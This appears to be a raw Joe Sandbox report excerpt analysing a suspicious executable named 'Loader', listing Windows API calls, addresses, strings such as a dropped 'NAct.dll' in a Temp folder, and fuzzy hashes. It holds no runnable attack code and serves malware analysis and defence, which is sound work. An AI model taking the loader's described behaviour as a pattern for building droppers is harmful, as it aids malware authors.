                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                                • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                                • Opcode ID: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                                                                                                                                                                                                                                                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                                • Opcode ID: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                                                                                                                                                                                                                                                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                                • String ID: F$A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00402646, 00402659
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658, xrefs: 004025BA
                                                                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 184305955-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                                • String ID: F$N$open
                                                                                                                                                                                                                                                                                                                • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
